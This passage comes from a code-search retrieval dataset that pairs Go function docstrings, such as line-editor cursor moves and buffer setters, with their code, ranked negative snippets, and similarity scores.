ts.tokens[0]\n\t}\n\n\treturn ts.tokens[ts.i-1]\n}", "func (c *charset) invert() {\n\tr := *c\n\tout := r[:0]\n\tvar next rune\n\tfor i := 0; i < len(r); i += 2 {\n\t\tlo, hi := r[i], r[i+1]\n\t\tif next <= lo-1 {\n\t\t\tout = append(out, next, lo-1)\n\t\t}\n\t\tnext = hi + 1\n\t}\n\tif next <= unicode.MaxRune {\n\t\tout = append(out, next, unicode.MaxRune)\n\t}\n\t*c = out\n}", "func ShiftLetter(charCode rune, shift int32) rune {\n\t// actual value of shift should not be larger\n\t// than 26 or smaler than -26\n\tactualShift := shift % 26\n\n\t// Handle lowercase letters (a-z)\n\tif charCode >= LowerCaseA &&\n\t\tcharCode <= LowerCaseZ {\n\t\tshifted := charCode + actualShift\n\t\tif shifted > LowerCaseZ {\n\t\t\treturn LowerCaseA + (shifted - LowerCaseZ) - 1\n\t\t}\n\t\tif shifted < LowerCaseA {\n\t\t\treturn LowerCaseZ - (LowerCaseA - shifted) + 1\n\t\t}\n\t\treturn shifted\n\t}\n\n\t// Handle uppercase letters (a-z)\n\tif charCode >= UpperCaseA &&\n\t\tcharCode <= UpperCaseZ {\n\t\tshifted := charCode + actualShift\n\t\tif shifted > UpperCaseZ {\n\t\t\treturn UpperCaseA + (shifted - UpperCaseZ) - 1\n\t\t}\n\t\tif shifted < UpperCaseA {\n\t\t\treturn UpperCaseZ - (UpperCaseA - shifted) + 1\n\t\t}\n\t\treturn shifted\n\t}\n\n\t// Keep unshifted\n\treturn charCode\n}", "func (p *parser) previous() lexer.Token {\n\treturn p.tokens[p.current-1]\n}", "func (l *Lexer) readChar() {\n if l.readPosition >= len(l.input) {\n l.ch = 0\n // Note for go else should be in the same line as { because go automatically insert ;\n } else {\n l.ch = l.input[l.readPosition]\n }\n l.position = l.readPosition\n // Note readPosition is always faster by 1?\n l.readPosition += 1\n}", "func (o *outputs) printCharWise(c config) (ret string) {\n\tprevLength := len(o.prev)\n\n\tfor i := 0; i < len(o.cur); i++ {\n\t\tif i < prevLength {\n\t\t\t// If prev string was short,\n\t\t\t// nothing to compare\n\t\t\tif o.cur[i] == o.prev[i] {\n\t\t\t\t// As is.\n\t\t\t\tret += string(o.cur[i])\n\t\t\t} else {\n\t\t\t\t// Operate\n\t\t\t\t// TODO: Don't highlight whitespace\n\t\t\t\tret += getHighlightedChar(string(o.cur[i]))\n\t\t\t}\n\t\t} else {\n\t\t\tret += string(o.cur[i])\n\t\t}\n\t}\n\treturn\n}", "func (l *StringLexer) Backup() {\n\tl.pos -= l.width\n\tif l.width == 1 && l.pos >= 0 && l.inputLen() > l.pos {\n\t\tif l.input[l.pos] == '\\n' {\n\t\t\tl.line--\n\t\t}\n\t}\n}", "func (iter *radixIterator) Prev() {\n\tif iter.resIter == nil {\n\t\treturn\n\t}\n\tif !iter.isReverser {\n\t\titer.SeekForPrev(iter.Key())\n\t\tif iter.err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\t// for reverse iterator, prev is just next\n\titer.cursorKey, iter.cursor = iter.resIter.Next()\n}", "func (w *IPWriter) SetCurrentByte(n uint) {\n\tw.SetCurrentLine(n / BytesInLn)\n}", "func (lx *Lexer) backup() {\n\tlx.pos -= lx.width\n}", "func ChangeStringElement(in string, position int, symbol rune) string {\n\tr := []rune(in)\n\tif len(r) <= position {\n\t\treturn in\n\t}\n\tr[position] = symbol\n\treturn string(r)\n\n}", "func CursorForward(c uint) {\n\temitEscape(\"C\", c)\n}", "func (s *Scanner) curr() rune {\n\treturn s.buf[s.bufi]\n}", "func (a *Art) SavePrevious(b *Buf) {\n\tif a.Page.AnsSave == \"on\" {\n\t\tb.ArrStr1 = append(append(b.ArrStr1, \" \"), a.Page.AnsWeb...)\n\t\tb.ArrStr2 = append(append(b.ArrStr2, \" \"), a.Page.AnsFile...)\n\t}\n\ta.Page.AnsWeb = b.ArrStr1\n\ta.Page.AnsFile = b.ArrStr2\n}", "func (player *musicPlayer) previous() (string, error) {\n\tplayer.Lock()\n\tvar songToResume string\n\tif player.state.current > 0 {\n\t\tif player.state.status == playing {\n\t\t\tplayer.stopFlow()\n\t\t}\n\t\tplayer.state.current -= 1\n\t\tsongToResume = player.state.queue[player.state.current]\n\t} else {\n\t\tplayer.Unlock()\n\t\treturn songToResume, errors.New(cannot_previous_msg)\n\t}\n\n\tplayer.Unlock()\n\tch := make(chan error)\n\tdefer close(ch)\n\tgo player.playQueue(0, ch)\n\terr := <-ch\n\n\treturn songToResume, err\n}", "func main() {\n\tvar a , b=10,20\n\tprintln(\"the data before swap \", a , b)\n\n\t//swap the data\n\ta, b = b, a\n\tprintln(\"the data after swap \" ,a , b) //20 , 10\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n\t// Correct newline count.\n\tif l.width == 1 && l.input[l.pos] == '\\n' {\n\t\tl.line--\n\t}\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n\tl.width = 0\n}", "func (s *Set) SetCurrentIterationSymbol(str string) {\n\ts.CurrentIterationSymbol = str\n}", "func swap(a ,b string) (string,string) {\n\treturn b,a\n}", "func (t *Thread) Swap() {\n\tt.stack[t.sp-1], t.stack[t.sp-2] = t.stack[t.sp-2], t.stack[t.sp-1]\n}", "func (d *Deck) PushBack(v string) {\n\tif d.head-1 == d.tail {\n\t\tinv = 1\n\t\td.pushtocap(v)\n\t} else {\n\t\tif d.tail == cap(d.deck)-1 && d.head == 0 {\n\t\t\tinv = -1\n\t\t} else if d.tail == cap(d.deck) && d.head > 0 {\n\t\t\td.tail = 0\n\t\t\tinv = 1\n\t\t}\n\t\td.deck[d.tail] = v\n\t\td.tail += inv\n\t}\n}", "func (x circle) Swap(i, j int) { x[i], x[j] = x[j], x[i] }" ]
[ "0.5779657", "0.537581", "0.5162446", "0.50913924", "0.50529397", "0.4990177", "0.49679735", "0.48747104", "0.48697123", "0.4851855", "0.4823436", "0.47806108", "0.4761153", "0.4752942", "0.47519898", "0.47460264", "0.47025988", "0.4697588", "0.46973363", "0.4685477", "0.467096", "0.46502972", "0.4643704", "0.4621423", "0.46112326", "0.45796677", "0.45647508", "0.45647508", "0.45647508", "0.45647508", "0.45647508", "0.45647508", "0.45647508", "0.45358258", "0.45115083", "0.45080918", "0.4505153", "0.4497081", "0.44908786", "0.4488833", "0.4485762", "0.4481217", "0.44749808", "0.44716823", "0.4469129", "0.44667238", "0.446372", "0.4462286", "0.4462286", "0.4452614", "0.44443238", "0.442729", "0.44249073", "0.44234538", "0.44228503", "0.4419488", "0.44151652", "0.4409711", "0.44047508", "0.43988162", "0.43960017", "0.4394507", "0.43887046", "0.43839154", "0.43730542", "0.4370679", "0.43611777", "0.4357473", "0.43559155", "0.43542466", "0.43423438", "0.43355477", "0.4301466", "0.42963454", "0.42961395", "0.42953512", "0.42725128", "0.42687577", "0.42599028", "0.42496917", "0.42496467", "0.42440653", "0.42410812", "0.42410812", "0.42410812", "0.42410812", "0.42410812", "0.42410812", "0.42410812", "0.42410812", "0.42410812", "0.42410812", "0.42410812", "0.42349556", "0.42322257", "0.42313075", "0.42310157", "0.42290518", "0.4227781", "0.42251262" ]
0.54316425
1
Set the line buffer to a string.
func (ls *linestate) editSet(s string) { ls.buf = []rune(s) ls.pos = len(ls.buf) ls.refreshLine() }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func Buffer() string {\n\treturn C.GoString(C.rl_line_buffer)\n}", "func (v *TextView) SetBuffer(buffer *TextBuffer) {\n\tC.gtk_text_view_set_buffer(v.native(), buffer.native())\n}", "func (src *Source) SetBuffer(buf []byte) {\n\tsrc.buf = buf\n}", "func (l *StringLexer) BufferString() string {\n\treturn l.input[l.start:l.pos]\n}", "func (s *VisvalingamSimplifier) LineString(ls orb.LineString) orb.LineString {\n\treturn lineString(s, ls)\n}", "func (ls *linestate) String() string {\n\treturn string(ls.buf)\n}", "func (b *buffer) Line(content string, indent int) {\n\tb.Write(fmt.Sprintf(\"%s\\n\", content), indent)\n}", "func (b *Builder) Line(text string) *Builder {\n\treturn b.write(text)\n}", "func (w *Writer) SetBuffer(raw []byte) {\n\tif w.err != nil {\n\t\treturn\n\t}\n\tw.b = w.b[:0]\n\tw.b = append(w.b, raw...)\n}", "func ResetLine(str string) (out string) {\n\treturn applyTransform(str, func(idx int, line string) string {\n\t\treturn fmt.Sprintf(\"%s%s\", RESET_LINE, line)\n\t})\n}", "func (s *Store) LineString(line int) (string, error) {\n\tif line < 0 || line >= len(s.lines) {\n\t\treturn \"\", fmt.Errorf(\"LineString: Invalid offset %v\", line)\n\t}\n\treturn s.lines[line].String(), nil\n}", "func (Screen *ScreenManager) ResetLine(str string) (out string) {\n\treturn applyScreenTransform(str, func(idx int, line string) string {\n\t\treturn fmt.Sprintf(\"%s\"+RESET_LINE, line)\n\t})\n}", "func (b *Buffer) Line(n int) string {\n\tif n >= len(b.lines) {\n\t\treturn \"\"\n\t}\n\treturn string(b.lines[n].data)\n}", "func (p *Buffer) SetBuf(s []byte) {\n\tp.buf = s\n\tp.index = 0\n\tp.length = len(s)\n}", "func (l Line) String() string {\n\treturn *(*string)(unsafe.Pointer(&l.line))\n}", "func (r *DBReader) SetBuffer(buffer io.Reader) {\n\tr.buffer = buffer\n}", "func (l *Line) String() string { return string(l.s) }", "func (ts *System) WriteLine(str string) {\n\tts.pages[ts.page].lines[ts.pages[ts.page].line] = &line{}\n\n\tline := \"\"\n\tfor _, char := range strings.Split(str, \"\") {\n\t\tif char == \"\\t\" {\n\t\t\tchar = \" \"\n\t\t}\n\n\t\tline += char\n\n\t\tif ts.pages[ts.page].editable {\n\t\t\tts.needsDraw = append(ts.needsDraw, char)\n\t\t}\n\t}\n\n\tif !ts.pages[ts.page].editable {\n\t\tts.delegateKeyPress(engo.Key(-1), &input.Modifiers{Output: true, Line: &line})\n\t\tts.delegateKeyPress(engo.KeyEnter, &input.Modifiers{Ignore: true, Output: true})\n\t} else {\n\t\tts.needsDraw = append(ts.needsDraw, \"\\n\")\n\t}\n}", "func (buf *Buf) AppendLine(s string) {\n\tbn := NewBufLineNode(s)\n\tbuf.appendNode(bn)\n}", "func (src *Source) SetNewBuffer() {\n\tsrc.buf = make([]byte, 64)\n}", "func (ed *Editor) putString(s string) {\n\ted.buffer.ClearSel(ed.dot)\n\taddr := ed.buffer.InsertString(ed.dot.From, s)\n\ted.dot.To = addr\n}", "func (a *Mpflt) SetString(as string)", "func (tr *testTalker) putLine(line string) {\n\ttr.output = append(tr.output, line)\n}", "func (s *Buffer) String() string {\n\ts.mutex.Lock()\n\tdefer s.mutex.Unlock()\n\treturn s.buffer.String()\n}", "func (t *tScreen) writeString(s string) {\r\n\tif t.buffering {\r\n\t\tio.WriteString(&t.buf, s)\r\n\t} else {\r\n\t\tio.WriteString(t.c, s)\r\n\t}\r\n}", "func (self Source) SetBuffer(buffer Buffer) {\n\tself.Seti(AlBuffer, int32(buffer))\n}", "func (w *IPWriter) SetCurrentLine(n uint) {\n\tw.currentLine = n\n}", "func SetLines(l []string) {\n\tlines = l\n}", "func (tb *TextBuf) AppendTextLine(text []byte, saveUndo, signal bool) *TextBufEdit {\n\ted := tb.EndPos()\n\tsz := len(text)\n\taddLF := false\n\tif sz > 0 {\n\t\tif text[sz-1] != '\\n' {\n\t\t\taddLF = true\n\t\t}\n\t} else {\n\t\taddLF = true\n\t}\n\tefft := text\n\tif addLF {\n\t\ttcpy := make([]byte, sz+1)\n\t\tcopy(tcpy, text)\n\t\ttcpy[sz] = '\\n'\n\t\tefft = tcpy\n\t}\n\ttbe := tb.InsertText(ed, efft, saveUndo, signal)\n\treturn tbe\n}", "func (p *MultiLineParser) sendLine() {\n\tdefer func() {\n\t\tp.buffer.Reset()\n\t\tp.rawDataLen = 0\n\t}()\n\n\tcontent := make([]byte, p.buffer.Len())\n\tcopy(content, p.buffer.Bytes())\n\tif len(content) > 0 || p.rawDataLen > 0 {\n\t\tp.lineHandler.Handle(NewMessage(content, p.status, p.rawDataLen, p.timestamp))\n\t}\n}", "func (w *DBWriter) SetBuffer(buffer io.Writer) {\n\tw.buffer = buffer\n}", "func Line(prompt string) (string, error) {\n\tins := getInstance()\n\tins.SetPrompt(prompt)\n\treturn ins.Readline()\n}", "func NewLine(text string) *Line {\n\treturn &Line{text, time.Now(), nil}\n}", "func NewBufLineNode(s string) *BufNode {\n\treturn NewBufNode(lfStr(s))\n}", "func (file *File) setNewline(bufferStr string) {\n\n\t// Default to line feed.\n\tfile.newline = \"\\n\"\n\tcount := strings.Count(bufferStr, \"\\n\")\n\n\t// Check if carriage return is more popular.\n\tc := strings.Count(bufferStr, \"\\r\")\n\tif c > count {\n\t\tcount = c\n\t\tfile.newline = \"\\r\"\n\t}\n\n\t// Check for CRLF or LFCR.\n\tfor _, newline := range []string{\"\\n\\r\", \"\\r\\n\"} {\n\t\tc := strings.Count(bufferStr, newline)\n\t\t// Factor of two to prevent overcounting.\n\t\tif c > count/2 {\n\t\t\tcount = c\n\t\t\tfile.newline = newline\n\t\t}\n\t}\n\n}", "func (b *Blueprint) LineString(column string) *ColumnDefinition {\n\treturn b.addColumn(\"linestring\", column, nil)\n}", "func (self Text) SetString(s string) {\n\tC.sfText_setString(self.Cref, C.CString(s))\n}", "func (s *Store) SetLineDelim(str string) {\n\ts.delim = str\n}", "func (e *Input) setText(text string) {\n\te.text.Set([]rune(text))\n\t// TODO: Enable when RuneBuf supports cursor movement for CJK.\n\t// e.ensureCursorIsVisible()\n\te.offset = 0\n}", "func (c *CmdBuff) SetText(text, suggestion string) {\n\tc.mx.Lock()\n\t{\n\t\tc.buff, c.suggestion = []rune(text), suggestion\n\t}\n\tc.mx.Unlock()\n\tc.fireBufferCompleted(c.GetText(), c.GetSuggestion())\n}", "func (rw *DBReaderWriter) SetBuffer(buffer io.ReadWriter) {\n\trw.buffer = buffer\n}", "func (s *String) Set(str string) {\n\ts.Value = []byte(str)\n\ts.Length = int32(len(s.Value))\n}", "func (bw *BufWriter) String(val string) {\n\tif bw.Error != nil {\n\t\treturn\n\t}\n\tbw.stringBuf = String(val, bw.stringBuf[:0])\n\t_, bw.Error = bw.writer.Write(bw.stringBuf)\n}", "func (cl *charLine) string() string {\n\treturn string(*cl)\n}", "func (c *ConsoleWrapper) SendLine(s string) {\n\t_, err := c.console.SendLine(s)\n\tassert.NoError(c.tester, err, \"Error sending line %s\", s)\n}", "func (c *ConsoleWrapper) SendLine(s string) {\n\t_, err := c.console.SendLine(s)\n\tassert.NoError(c.tester, err, \"Error sending line %s\", s)\n}", "func (s *Store) ResetLine(line int, st string) (string, error) {\n\tif line < 0 || line >= len(s.lines) {\n\t\treturn \"\", fmt.Errorf(\"ResetLine: Invalid offset %v\", line)\n\t}\n\toriginal := s.lines[line].String()\n\ts.lines[line].reset(st)\n\tcs := s.undoFac()\n\tcs.ChangeLine(line, original, st)\n\ts.AddUndoSet(cs)\n\treturn original, nil\n}", "func (s *SyncString) Set(v string) {\n\ts.Lock()\n\tdefer s.Unlock()\n\ts.string = v\n}", "func (i *InMemory) SetString(key, value string) {\n\ti.lock.Lock()\n\tdefer i.lock.Unlock()\n\n\ti.data[key] = value\n}", "func NewLineFromString(s string) *Line {\n\treturn &Line{[]rune(s)}\n}", "func (b *Buffer) AppendString(v string) {\n\tb.buf = append(b.buf, v...)\n}", "func (buffer *Buffer) WriteString(s string) {\n\tif buffer == nil || buffer.B == nil {\n\t\treturn\n\t}\n\n\tif _, err := buffer.B.WriteString(s); err != nil {\n\t\t_, _ = fmt.Fprintf(os.Stderr, \"buffer write error: %v\\n\", err)\n\t\tbuffer.Error = err\n\t}\n}", "func (p *StreamParser) LineText() string {\n\treturn p.machine.LineText()\n}", "func NewBufferFromString(text string) *Buffer {\n\treturn NewBuffer(strings.NewReader(text), int64(len(text)), \"1.msg\", nil)\n}", "func (c *Console) SetChannelBuffer(i uint) {\n\tc.buffer = i\n}", "func PutLEStringToBuf(buf []byte, curPos int, str string) (nextPos int, err error) {\n\tnextPos, err = putLEStringToBuf(buf, curPos, str)\n\treturn\n}", "func (e *ObservableEditableBuffer) String() string {\n\treturn e.f.String()\n}", "func (recv *Value) SetString(vString string) {\n\tc_v_string := C.CString(vString)\n\tdefer C.free(unsafe.Pointer(c_v_string))\n\n\tC.g_value_set_string((*C.GValue)(recv.native), c_v_string)\n\n\treturn\n}", "func (me *TStrokeMiterLimitValueType) Set(s string) { (*xsdt.String)(me).Set(s) }", "func Line(emoji string, style Style, s string) FancyLine {\n\treturn FancyLine{\n\t\temoji: emoji,\n\t\tstyle: style,\n\t\tformat: \"%s\",\n\t\targs: []interface{}{s},\n\t}\n}", "func (instance *Instance) SetString(fieldName, value string) error {\n\tfieldNameCStr := C.CString(fieldName)\n\tdefer C.free(unsafe.Pointer(fieldNameCStr))\n\n\tvalueCStr := C.CString(value)\n\tdefer C.free(unsafe.Pointer(valueCStr))\n\n\tretcode := int(C.RTI_Connector_set_string_into_samples(unsafe.Pointer(instance.output.connector.native), instance.output.nameCStr, fieldNameCStr, valueCStr))\n\treturn checkRetcode(retcode)\n}", "func (r *Replacement) Set(s string) error {\n\tparts := strings.Split(s, \":\")\n\tif len(parts) != 2 {\n\t\treturn errors.Errorf(\"invalid number of dash-separated parts in binary replacement; expected 2, got %d\", len(parts))\n\t}\n\tif err := r.Addr.Set(parts[0]); err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\tbuf, err := hex.DecodeString(parts[1])\n\tif err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\tr.Buf = buf\n\treturn nil\n}", "func (c *Console) writeLine(b []byte) error {\n\tif _, err := c.w.Write(b); err != nil {\n\t\treturn err\n\t}\n\tcrlf := []byte{'\\r', '\\n'}\n\tif _, err := c.w.Write(crlf); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (r *Render) BreakLine(buffer *Buffer) {\n\t// Erasing and Render\n\tcursor := runewidth.StringWidth(buffer.Document().TextBeforeCursor()) + runewidth.StringWidth(r.getCurrentPrefix())\n\tr.clear(cursor)\n\tr.renderPrefix()\n\tr.out.SetColor(r.inputTextColor, r.inputBGColor, false)\n\tr.out.WriteStr(buffer.Document().Text + \"\\n\")\n\tr.out.SetColor(DefaultColor, DefaultColor, false)\n\tdebug.AssertNoError(r.out.Flush())\n\tif r.breakLineCallback != nil {\n\t\tr.breakLineCallback(buffer.Document())\n\t}\n\n\tr.previousCursor = 0\n}", "func (e *ObservableEditableBuffer) Set(hash []byte) {\n\te.details.Hash.Set(hash)\n}", "func (l *Selectable) SetText(s string) {\n\tl.initialize()\n\tif l.lastValue != s {\n\t\tl.source = newStringSource(s)\n\t\tl.lastValue = s\n\t\tl.text.SetSource(l.source)\n\t}\n}", "func (me *TLengthType) Set(s string) { (*xsdt.String)(me).Set(s) }", "func (path *Path) Line(pt Point) {\n\twriteCommand(&path.buf, \"l\", pt.X, pt.Y)\n}", "func (tv *TerminalView) SetCurrentBuffer(index int, mainText, secondaryText string, shortcut rune) {\n\t// special handlinge for the debug buffer with and without unread count.\n\tif mainText == \"[red]debug[white]\" || mainText == \"[pink]debug **[white]\" {\n\t\ttv.pages.SwitchToPage(\"page-debug\")\n\t\t// remove the unread aspect.\n\t\ttv.bufferList.List.SetItemText(index, \"[red]debug[white]\", \"\")\n\t\treturn\n\t}\n\t// Handle weechat buffers.\n\tbuf := tv.bufferList.getByFullName(mainText)\n\tif buf != nil {\n\t\t// For the buffer widget, set the right number of lines.\n\t\tif bufView, ok := tv.buffers[buf.FullName]; ok {\n\t\t\t//\t\t\ttv.app.QueueUpdate(func() {\n\t\t\tbufView.SetText(buf.TitleStr(true) + buf.GetLines(true))\n\t\t\ttv.bufferList.List.SetItemText(index, fmt.Sprintf(\"%v\", buf.FullName), \"\")\n\t\t\t// Then, switch to the page that is embedding the above buffer widget.\n\t\t\ttv.pages.SwitchToPage(fmt.Sprintf(\"page-%v\", buf.FullName))\n\t\t\t// Send command to load nicklist of the buffer if there\n\t\t\t// is no nicklist in it and it is a channel not person (# check)\n\t\t\tif buf.FullName != \"debug\" && buf.NickList.GetItemCount() == 0 && strings.Contains(buf.FullName, \"#\") {\n\t\t\t\ttv.sendchan <- fmt.Sprintf(\"(nicklist) nicklist %v\\n\", buf.FullName)\n\t\t\t}\n\t\t\t// })\n\t\t} else {\n\t\t\ttv.Debug(\n\t\t\t\tfmt.Sprintf(\n\t\t\t\t\t\"Failed to find the buffer in tv.buffers %v buffername %v\\n\",\n\t\t\t\t\tmainText, buf.FullName))\n\t\t}\n\n\t} else {\n\t\ttv.Debug(fmt.Sprintf(\"Failed to find the buffer %v\\n\", mainText))\n\t}\n}", "func (o *SearchLine) SetLine(v int32) {\n\to.Line = &v\n}", "func (b *Buffer) String() string {\n\treturn string(b.buf)\n}", "func (s *SSAGenState) SetLineno(l int32)", "func (p *StringBuilder) AppendString(str string) {\n\tp.buffer = append(p.buffer, str...)\n}", "func (p *StringBuilder) String() string {\n\treturn string(p.buffer)\n}", "func (t *tube) SendLine(input interface{}) (int, error) {\n\tb := Bytes(input)\n\tb = append(b, t.NewLine())\n\treturn t.in.Write(b)\n}", "func (fs *FakeSession) SetStr(oid string, value string) *FakeSession {\n\treturn fs.SetByte(oid, []byte(value))\n}", "func (s *Surface) SetLineMiterLimit(miter float64) {\n\ts.Ctx.Set(\"miterLimit\", miter)\n}", "func SetClipboardString(str string) {\n\tcp := C.CString(str)\n\tdefer C.free(unsafe.Pointer(cp))\n\tC.glfwSetClipboardString(nil, cp)\n\tpanicError()\n}", "func WriteString(buffer []byte, offset int, value string) {\n WriteBytes(buffer, offset, []byte(value))\n}", "func (r *textprotoReader) ReadLine() (string, error) {\n\tline, err := r.readLineSlice()\n\treturn string(line), err\n}", "func TestReadLine(t *testing.T) {\n\tvar buf bytes.Buffer\n\ts := &session{}\n\ts.srv = &Server{}\n\ts.br = bufio.NewReader(&buf)\n\n\t// Ensure readLine() returns an EOF error on an empty buffer.\n\t_, err := s.readLine()\n\tif err != io.EOF {\n\t\tt.Errorf(\"readLine() on empty buffer returned err: %v, want EOF\", err)\n\t}\n\n\t// Ensure trailing <CRLF> is stripped.\n\tline := \"FOO BAR BAZ\\r\\n\"\n\tcmd := \"FOO BAR BAZ\"\n\tbuf.Write([]byte(line))\n\toutput, err := s.readLine()\n\tif err != nil {\n\t\tt.Errorf(\"readLine(%v) returned err: %v\", line, err)\n\t} else if output != cmd {\n\t\tt.Errorf(\"readLine(%v) returned %v, want %v\", line, output, cmd)\n\t}\n}", "func (b *SafeBuffer) String() string {\n\tb.m.RLock()\n\tdefer b.m.RUnlock()\n\treturn b.b.String()\n}", "func (l *settableString) Set(s string) error {\n\tl.s = s\n\tl.isSet = true\n\treturn nil\n}", "func (me *TScriptType) Set(s string) { (*xsdt.String)(me).Set(s) }", "func SetReadLineFn(fn ReadLineFnType) {\n\treadLineFn = fn\n}", "func (tb *TextBuf) AppendTextLineMarkup(text []byte, markup []byte, saveUndo, signal bool) *TextBufEdit {\n\ted := tb.EndPos()\n\tsz := len(text)\n\taddLF := false\n\tif sz > 0 {\n\t\tif text[sz-1] != '\\n' {\n\t\t\taddLF = true\n\t\t}\n\t} else {\n\t\taddLF = true\n\t}\n\tefft := text\n\tif addLF {\n\t\ttcpy := make([]byte, sz+1)\n\t\tcopy(tcpy, text)\n\t\ttcpy[sz] = '\\n'\n\t\tefft = tcpy\n\t}\n\ttbe := tb.InsertText(ed, efft, saveUndo, false)\n\ttb.Markup[tbe.Reg.Start.Ln] = markup\n\tif signal {\n\t\ttb.TextBufSig.Emit(tb.This(), int64(TextBufInsert), tbe)\n\t}\n\treturn tbe\n}", "func (me *TPathDataType) Set(s string) { (*xsdt.String)(me).Set(s) }", "func (c *Conn) readLine() (string, error) {\n\tif c.server.ReadTimeout != 0 {\n\t\tif err := c.conn.SetReadDeadline(time.Now().Add(c.server.ReadTimeout)); err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t}\n\n\treturn c.text.ReadLine()\n}", "func (c *Client) ReadLine() (line string, err error) {\n\tb, _, err := c.r.ReadLine()\n\tif err == io.EOF {\n\t\treturn\n\t}\n\tif err != nil {\n\t\treturn\n\t}\n\tline = string(b)\n\treturn\n}", "func SendLine(id, line string) error {\n\treturn registry.SendLine(id, line)\n}", "func (v *Value) SetString(val string) {\n\tcstr := C.CString(val)\n\tdefer C.free(unsafe.Pointer(cstr))\n\tC.g_value_set_string(v.Native(), (*C.gchar)(cstr))\n}", "func (tv *TextView) SetBuf(buf *TextBuf) {\n\tif buf != nil && tv.Buf == buf {\n\t\treturn\n\t}\n\t// had := false\n\tif tv.Buf != nil {\n\t\t// had = true\n\t\ttv.Buf.DeleteView(tv)\n\t}\n\ttv.Buf = buf\n\ttv.ResetState()\n\tif buf != nil {\n\t\tbuf.AddView(tv)\n\t\tbhl := len(buf.PosHistory)\n\t\tif bhl > 0 {\n\t\t\ttv.CursorPos = buf.PosHistory[bhl-1]\n\t\t\ttv.PosHistIdx = bhl - 1\n\t\t}\n\t}\n\ttv.LayoutAllLines(false)\n\ttv.SetFullReRender()\n\ttv.UpdateSig()\n\ttv.SetCursorShow(tv.CursorPos)\n}", "func (me *TxsdTextPathTypeSpacing) Set(s string) { (*xsdt.String)(me).Set(s) }", "func (tb *TextBuf) SetText(txt []byte) {\n\ttb.Defaults()\n\ttb.Txt = txt\n\ttb.BytesToLines()\n\ttb.Refresh()\n}", "func (s *Store) NewLine(ln int, st string) {\n\tif ln <= 0 {\n\t\ts.lines = append([]*line{newLine(st)}, s.lines...)\n\t\treturn\n\t}\n\tif ln >= len(s.lines) {\n\t\ts.lines = append(s.lines, newLine(st))\n\t\treturn\n\t}\n\ts.lines = append(s.lines[:ln], append([]*line{newLine(st)}, s.lines[ln:]...)...)\n\tcs := s.undoFac()\n\tcs.AddLine(ln)\n\tcs.ChangeLine(ln+1, \"\", st)\n\ts.AddUndoSet(cs)\n\treturn\n}", "func (me *TxsdTextPathTypeMethod) Set(s string) { (*xsdt.String)(me).Set(s) }", "func (l *Linenoise) historySet(idx int, line string) {\n\tl.history[len(l.history)-1-idx] = line\n}", "func (me *TxsdPresentationAttributesFillStrokeStrokeLinejoin) Set(s string) {\n\t(*xsdt.String)(me).Set(s)\n}", "func (me *TCoordinatesType) Set(s string) { (*xsdt.String)(me).Set(s) }", "func SetString(filename, JSONpath, value string) error {\n\tjf, err := NewFile(filename)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn jf.SetString(JSONpath, value)\n}" ]
[ "0.6371343", "0.5862435", "0.5831232", "0.5748995", "0.56864643", "0.5641822", "0.56276137", "0.55717295", "0.55606496", "0.5525872", "0.5525364", "0.55208725", "0.5504437", "0.54288745", "0.5415996", "0.54111296", "0.5385222", "0.53531575", "0.5333338", "0.53176993", "0.5314729", "0.5284567", "0.5249006", "0.52373844", "0.5228486", "0.52122414", "0.51713514", "0.5167013", "0.51628494", "0.5159253", "0.5145214", "0.51417756", "0.512638", "0.5117952", "0.51085544", "0.51015514", "0.5097919", "0.50916874", "0.5091207", "0.50873685", "0.5086779", "0.5059335", "0.5057611", "0.50513256", "0.50500566", "0.50500566", "0.50418746", "0.50243014", "0.5020559", "0.50168234", "0.4998329", "0.49902308", "0.4983668", "0.49759632", "0.49465817", "0.49354035", "0.49208257", "0.4919166", "0.48913053", "0.48867536", "0.4880203", "0.4878562", "0.48748374", "0.48639017", "0.48522487", "0.48486423", "0.48462158", "0.48360595", "0.4812269", "0.48115563", "0.48089984", "0.4803835", "0.48034912", "0.4793342", "0.47906056", "0.47837958", "0.4782493", "0.47743696", "0.47725868", "0.47718102", "0.4770859", "0.47522694", "0.4751168", "0.4748545", "0.47372732", "0.472445", "0.47240588", "0.47140163", "0.4712008", "0.47048846", "0.4695775", "0.46916386", "0.46877617", "0.46857986", "0.46844533", "0.46824178", "0.46791637", "0.46680346", "0.46612784", "0.46583658" ]
0.5652134
5
Move cursor on the left.
func (ls *linestate) editMoveLeft() { if ls.pos > 0 { ls.pos-- ls.refreshLine() } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
